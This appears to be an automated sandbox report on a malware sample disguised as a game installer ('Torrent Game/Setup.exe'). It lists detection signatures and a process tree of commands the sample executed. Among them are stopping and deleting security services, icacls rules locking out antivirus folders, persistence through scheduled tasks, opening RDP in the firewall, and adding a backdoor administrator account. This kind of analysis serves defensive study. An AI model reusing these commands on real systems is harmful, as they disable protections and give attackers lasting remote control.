Analysis
-
max time kernel
150s -
max time network
172s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
-
submitted
30-04-2024 08:50
General
-
Target
Torrent Game/Setup.exe
-
Size
6.8MB
-
MD5
f0f01fb9ad7ecab5d698da5679175f29
-
SHA1
314198b1a6cf81cd3b64a91f4eab5ad881ecff2c
-
SHA256
5f1c46da9e266b1f7f31953e593636c6b0e1968636e81e62e820122bfa40706f
-
SHA512
c67c093543bd7ef126801dd6e42a6864471dede82d35bdf9c2c508d63af9d0effd6ca312c37bc1261925ba027d4162543ce5267eb93eb5d14abf6d2b89fabf9c
-
SSDEEP
196608:+/Qr1IjiQrQg+2JraSvJ4NQ7Esnoy8aX8v:V1GiQrQ7HSvJRzoy8aXw
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs
-
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
-
Blocks application from running via registry modification 29 IoCs
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 2 IoCs
-
Modifies Windows Firewall 2 TTPs 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 14 IoCs
-
Loads dropped DLL 1 IoCs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Themida packer 61 IoCs
Detects Themida, an advanced Windows software protection system.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 7 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Modifies WinLogon 2 TTPs 4 IoCs
-
AutoIT Executable 47 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
-
Drops file in Program Files directory 52 IoCs
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Modifies registry class 3 IoCs
-
NTFS ADS 3 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of FindShellTrayWindow 6 IoCs
-
Suspicious use of SendNotifyMessage 6 IoCs
-
Suspicious use of SetWindowsHookEx 21 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Torrent Game\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Torrent Game\Setup.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Torrent Game\GameInstall.exe"C:\Users\Admin\AppData\Local\Temp\Torrent Game\GameInstall.exe"2⤵
- Executes dropped EXE
-
-
C:\ProgramData\Setup\install.exeC:\ProgramData\Setup\install.exe -pputinxuilo62⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Setup\GameGuard.exe"C:\ProgramData\Setup\GameGuard.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocks application from running via registry modification
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc delete swprv5⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop mbamservice5⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop bytefenceservice5⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc delete bytefenceservice5⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc delete mbamservice5⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc delete crmsvc5⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state on5⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN5⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN5⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN5⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN5⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force4⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\Delete.bat4⤵
-
C:\Windows\system32\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
-
-
-
C:\ProgramData\Setup\update.exe"C:\ProgramData\Setup\update.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ExpressCheckUP" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CheckUP" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CheckGlobal" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\ProgramData\Microsoft\win.exeC:\ProgramData\Microsoft\win.exe -ppidar4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\DataBaseD\RecoveryHosts" /TR "C:\ProgramData\Microsoft\Windows\Aljy2WaWirYOCSFb6j\DataBaseD.bat" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Hor" /TR "C:\ProgramData\Microsoft\Windows\Aljy2WaWirYOCSFb6j\\Game.exe -ppidar" /SC ONCE /ST 11:59 /SD 30/04/2024 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)4⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\ProgramData\Setup\svchost.exeC:\ProgramData\Setup\svchost.exe -ppidar4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Setup\IP.exe"C:\ProgramData\Setup\IP.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- NTFS ADS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\unsecapp.exeC:\Windows\SysWOW64\unsecapp.exe6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat6⤵
- Drops file in Drivers directory
-
-
-
C:\ProgramData\Setup\smss.exe"C:\ProgramData\Setup\smss.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST6⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST6⤵
- Creates scheduled task(s)
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add6⤵
-
C:\Windows\system32\net.exenet user John 12345 /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add8⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add6⤵
-
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add8⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add6⤵
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add8⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add6⤵
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add8⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add6⤵
-
C:\Windows\system32\net.exenet localgroup "Administrators" John /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add8⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add6⤵
-
C:\Windows\system32\net.exenet localgroup "Administradores" John /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add8⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add6⤵
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add8⤵
-
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i6⤵
- Sets DLL path for service in the registry
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow7⤵
- Modifies Windows Firewall
-
-
-
-
-
C:\ProgramData\Setup\Desktop.exeC:\ProgramData\Setup\Desktop.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)4⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)4⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)4⤵
-
C:\Windows\system32\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)4⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)4⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)4⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)4⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)4⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\FRST /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)4⤵
-
